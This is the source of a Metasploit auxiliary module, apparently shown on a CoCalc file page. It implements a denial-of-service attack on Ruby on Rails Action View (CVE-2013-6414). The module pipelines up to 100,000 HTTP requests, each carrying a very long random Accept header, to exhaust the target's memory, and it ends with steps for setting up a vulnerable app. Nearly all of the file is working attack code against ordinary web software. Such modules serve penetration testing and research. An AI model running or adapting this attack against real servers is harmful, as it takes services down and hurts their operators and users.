CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/http/rails_action_view.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Ruby on Rails Action View MIME Memory Exhaustion',12'Description' => %q{13This module exploits a Denial of Service (DoS) condition in Action View that requires14a controller action. By sending a specially crafted content-type header to a Rails15application, it is possible for it to store the invalid MIME type, and may eventually16consume all memory if enough invalid MIMEs are given.1718Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.19},20'Author' =>21[22'Toby Hsieh', # Reported the issue23'joev', # Metasploit24'sinn3r' # Metasploit25],26'License' => MSF_LICENSE,27'References' =>28[29[ 'CVE', '2013-6414' ],30[ 'OSVDB', '100525' ],31[ 'BID', '64074' ],32[ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ],33[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]34],35'DisclosureDate' => '2013-12-04'))3637register_options(38[39Opt::RPORT(80),40OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),41OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),42OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),43OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])44],45self.class)46end4748def host49host = datastore['RHOST']50host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 8051host52end5354def long_string55Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])56end5758#59# Returns a modified version of the URI that:60# 1. Always has a starting slash61# 2. Removes all the double slashes62#63def normalize_uri(*strs)64new_str = strs * "/"6566new_str = new_str.gsub!("//", "/") while new_str.index("//")6768# Makes sure there's a starting slash69unless new_str.start_with?("/")70new_str = '/' + new_str71end7273new_str74end7576def http_request77uri = normalize_uri(datastore['URIPATH'])7879http = ''80http << "GET #{uri} HTTP/1.1\r\n"81http << "Host: #{host}\r\n"82http << "Accept: #{long_string}\r\n"83http << "\r\n"8485http86end8788def run89begin90print_status("Stressing the target memory, this will take quite some time...")91datastore['RLIMIT'].times { |i|92connect93datastore['REQCOUNT'].times { sock.put(http_request) }94disconnect95}9697print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")98rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout99print_status("Unable to connect to #{host}.")100rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error101print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")102ensure103disconnect104end105end106end107108=begin109110Reproduce:1111121. Add a def index; end to ApplicationController1132. Add an empty index.html.erb file to app/views/application/index.html.erb1143. Uncomment the last line in routes.rb1154. Hit /application116117=end118119120